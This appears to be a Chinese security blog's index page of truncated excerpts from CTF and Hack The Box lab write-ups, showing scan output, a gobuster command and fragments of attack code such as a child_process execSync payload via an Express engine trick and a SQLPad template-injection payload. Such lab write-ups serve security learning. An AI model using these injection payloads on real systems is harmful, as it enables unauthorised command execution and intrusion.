信息搜集12345610.10.11.33:22 open10.10.11.33:80 open10.10.11.33:8080 open[*] alive ports len is: 3start vulscan[*] WebTitle http://10.10.11.33 code:301 len:0 title:None 跳转url: http://caption.htb[*] WebTitle http://10.10.11.33:8080 code:200 len:7191 title:GitBucket 8080 GitBucket exploits/GitBucket/gitbucket-unauthenticated-rce.md at master · kacperszurek/exploits 发现有目录：http://caption.htb:8080/、http://caption.htb:8080/root后者直接跳转到 root 用户，但是仍然需要验证。 http://caption.htb:8 ...

前言分数实在是难以启齿。终于想起来要复现这个了，就找到了不是 java 的部分 wp，后面的要是找到了再补充吧。 ezjs 谈Express engine处理引擎的一个trick 测试服务跑起本地服务 1node app.js break原理比如a.natro这个文件在被 render() 时，他就会自动执行 require natro 。 详细可以阅读引用文章。 测试我们在 node_modules 下想办法上传一个natro文件夹，然后添加进 index.js。这里的rename方法正好就可以做到。首先我们上传一个 index.js 文件，然后 rename 路径穿越到 node_modules 下面。 因此我们通过此方法，将其他后缀文件解析成需要的 ejs 格式。 首先我们需要上传上去 index.js 123exports.__express = function() { console.log(require('child_process').execSync('whoami').toString());}; ...

Tagless解题自带一个 dist.zip 文件。 12345678910111213141516171819@app.route("/report", methods=["POST"])def report(): bot = Bot() url = request.form.get('url') if url: try: parsed_url = urlparse(url) except Exception: return {"error": "Invalid URL."}, 400 if parsed_url.scheme not in ["http", "https"]: return {"error": "Invalid scheme." ...

ezblog环境搭建1docker run -it -d -p 9292:3000 -e 'FLAG=flag{G0t_1t}' lxxxin/wmctf2023_ezblog 代码分析app.js 中的 /api/debugger/auth 这个路由使用 node 仿造 flask 的 werkzeug 实现了一个 PIN 功能。 12345678910111213141516171819let pin = (0, uuid_1.v4)();app.post("/api/debugger/auth", (req, res) => { let username = req.body.username; let password = req.body.password; if (username === "debugger" && password === pin) { res.json({ code: 200, messa ...

被台风刮没了，刚返回文明世界。这周的这个还行，挺简单的。😢 信息搜集1234567start infoscan10.10.11.32:80 open10.10.11.32:22 open10.10.11.32:21 open[*] alive ports len is: 3start vulscan[*] WebTitle http://10.10.11.32 code:302 len:154 title:302 Found 跳转url: http://sightless.htb/ 子域名扫出来：sqlpad.sightless.htb Sqlpad 模板注入 huntr - The world’s first bug bounty platform for AI/ML 在 Connections 选择 Add connections，然后再选择 Mysql 服务，将下面的 payload 放入 Database 参数。 1{{ process.mainModule.require('child_process' ...

前言这周活太密了，趁还剩一天赶紧把这个打了，这 Windows 域渗透我也不会啊我去😡。 这个难度无愧于这个 INSANE，这篇 90%都是复现，最后的 PE 部分还每太整明白，后面如果有机会的话补充一下，并且总结下思路。 我这个是一点域渗透的基础也没有的学习，所以有些地方理解可能有问题，请大家一定要指出方便修改！！！ 信息搜集1234567891011121314start infoscan10.10.11.31:80 open10.10.11.31:88 open10.10.11.31:445 open10.10.11.31:139 open10.10.11.31:135 open[*] alive ports len is: 5start vulscan[*] WebTitle http://10.10.11.31 code:200 len:31235 title:Infiltrator.htb[*] NetInfo [*]10.10.11.31 [->]dc01 [->]10.10.11.31 1234567891011121314151 ...

PHP_MASTER PHP由mb_strpos与mb_substr执行差异导致的小trick - Eddie_Murphy - 博客园 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162<?php highlight_file( __FILE__);error_reporting(0);function substrstr($data){ $start = mb_strpos($data, "["); $end = mb_strpos($data, "]"); return mb_substr($data, $start + 1, $end - 1 - $start);}class A{ public $key; public function readflag(){ if($this->key= ...

WEBlyrics先是任意文件读取：把 app.py 等文件导出到本地搭起服务，发现有而读取的内容是 cookie 中的参数，因此可以先生成一个 cookie。然后更新一下生成的 cookie 就行。照着逻辑改改代码，这里有点乱。 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108import base64import hashlibimport hmacimport osimport picklefrom flask import make_response, requestunicode = strbasestring = str# Quoted from python bottle template, t ...

前言这个前面和后面都不太好操作，会很卡。而且做的时候也没有太多的参考，思路很混乱，这份整理之后的wp也是，凑活看看吧。 信息搜集只有 22 和 80 端口，扫描时显示了 host，绑定一下 monitorsthree.htb 。 子域名扫描12345678910111213141516gobuster vhost -u http://monitorsthree.htb --append-domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -r===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: ...